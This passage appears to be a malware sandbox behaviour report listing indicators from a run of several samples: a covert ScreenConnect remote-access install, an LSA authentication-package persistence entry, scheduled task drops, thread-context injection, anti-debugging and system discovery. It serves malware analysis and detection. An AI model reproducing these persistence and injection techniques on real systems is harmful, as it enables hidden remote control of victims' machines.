| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Boot or Logon Autostart Execution: Authentication Package
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | C:\Windows\system32\msiexec.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\jahxslxg.tmp | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\jahxslxg.newcfg | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 776 set thread context of 1968 | N/A | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe |
| PID 1892 set thread context of 3052 | N/A | C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe | C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe |
| PID 2024 set thread context of 2772 | N/A | C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe | C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe |
| PID 39504 set thread context of 39728 | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\f77f1be.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF431.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| File opened for modification | C:\Windows\Installer\f77f1be.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF326.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\f77f1c1.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f77f1bf.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF2F6.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\f77f1bf.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | N/A | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe |
| N/A | N/A | N/A | |
| N/A | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" | C:\Windows\system32\msiexec.exe | N/A |
